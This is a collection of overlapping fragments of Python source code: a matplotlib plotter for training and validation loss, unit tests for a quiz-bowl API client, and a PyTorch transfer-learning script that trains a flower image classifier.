continue", "robot goes at the end of its process sleep_joints = [0.0, 0.55, -1.2,", "0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop" ]
[ "train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors,", "plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None:", "None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss", "det er nok fint at have den udenfor men w/e train_loss_plot, = plt.plot(", "not draw: plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf()", "history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path", "val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is", "if not draw: plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name))", "nok fint at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss,", "label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf()", "name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\")", "with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss =", "plt.ion() # Ved ikke om man skal gøre det i hvert loop, det", "= plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss')", "path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss =", "hvert loop, det er nok fint at have den udenfor men w/e train_loss_plot,", "Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw:", "history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\")", "plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is not None: with", "plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with", "def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs):", "have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot,", "loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path", "intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss'])", "plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is", "draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range", "import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh')", "fint at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training", "from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss']", "[] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke", "is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False):", "= [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss))", "loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det i", "= history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-',", "'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path =", "plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh')", "plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if", "val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is not None: with cd(path):", "at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss')", "Ved ikke om man skal gøre det i hvert loop, det er nok", "import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors =", "def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors,", "train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path", "if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name,", "val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path):", "'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name))", "def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man", "val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det", "label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not", "os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss", "plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors =", "er nok fint at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range,", "range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det i hvert loop,", "matplotlib.pyplot as plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None):", "path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)),", "gøre det i hvert loop, det er nok fint at have den udenfor", "val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend()", "ikke om man skal gøre det i hvert loop, det er nok fint", "val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() #", "udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot(", "plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() return drawer", "plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om", "den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, =", "plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def", "drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal", "CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors", "i hvert loop, det er nok fint at have den udenfor men w/e", "train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre", "train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation", "= os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = []", "# Ved ikke om man skal gøre det i hvert loop, det er", "skal gøre det i hvert loop, det er nok fint at have den", "draw: plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() return", "= [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved", "det i hvert loop, det er nok fint at have den udenfor men", "as plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors", "save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-',", "os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)),", "loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot])", "label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is not", "path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None,", "path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss'])", "plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot,", "= range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det i hvert", "loop, det er nok fint at have den udenfor men w/e train_loss_plot, =", "= plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001)", "man skal gøre det i hvert loop, det er nok fint at have", "w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss,", "plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def", "men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range,", "train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if", "om man skal gøre det i hvert loop, det er nok fint at", "label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\"", "cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = []", "= history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if", "cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss']", "[] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion()", "train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range =", "val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show()", "loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is not None:", "import matplotlib.pyplot as plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\"," ]
[ "= client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID,", "> 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0)", "self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length", "= 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client", "client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def", "= client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID,", "QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int)", "client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self):", "client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0)", "USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client", "word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID,", "= 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID,", "client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf')", "test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def", "client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0, 'answer1')", "client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res", "QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self):", "client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0)", "False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0, 'answer1') self.assertRaises(ValueError, client.submit_answer(0, 'answer2'))", "unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def", "= 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs =", "API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client =", "> 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length,", "0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int)", "USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client", "USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL,", "res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res,", "QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client", "0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client =", "BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL,", "API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs", "API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID,", "int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length =", "import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0", "def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs", "= QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self):", "num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL,", "client import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY =", "<filename>web/test/test_client.py from client import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1'", "API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL,", "import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase):", "test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w)", "test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs >", "from client import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY", "= QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def", "self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0)", "self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word", "q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL,", "self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0,", "self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0, 'answer1') self.assertRaises(ValueError, client.submit_answer(0,", "def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False)", "int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word =", "class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs,", "def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length", "= QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def", "0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w,", "QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client =", "0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res =", "= client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "= client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0,", "= QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client", "USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self):", "'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0, 'answer1') self.assertRaises(ValueError,", "'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client =", "QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class", "test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length >", "QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self):", "API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client =", "0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions()", "self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0,", "def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str)" ]
[ "hidden else: print('No number of hidden inputs specified. Fallback to default inputs: 1024')", "set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer =", "classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def", "Sets the device based on the parameter. Also handles most edge-cases. Returns the", "nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output',", "parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float,", "save(model, train_data, epochs, architecture): ''' Saves the model to the given path. '''", "available; using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU')", "outputs = model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct +=", "torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our", "architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model", "in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()),", "nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion", "def save(model, train_data, epochs, architecture): ''' Saves the model to the given path.", "Saves the model to the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs:", "OrderedDict import os import argparse # Functions def arg_parser(): ''' Takes in command-line", "= learning_rate else: print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate =", "Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test", "transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'],", "with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3)", "for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our", "labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs = model.forward(inputs)", "else: print('No dropout specified. Fallback to default dropout: 0.05') dropout = 0.05 for", "transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir,", "1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified.", "epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss", "model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps %", "images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0)", "help='Learning Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units", "{}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No", "0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets", "for train, test and validation. Also loads dataloaders for all three in the", "transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229,", "print('Model saved to {}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu:", "\\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model", "model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint,", "'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file)", "1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0", "'/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,", "to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu':", "model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model,", "not available; using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using", "equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50):", "import datasets, models, transforms from collections import OrderedDict import os import argparse #", "hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback", "images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1)", "default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA", "specified. Fallback to default dropout: 0.05') dropout = 0.05 for parameter in model.parameters():", "print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if", "= models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input: Please use", "labels.to(device) 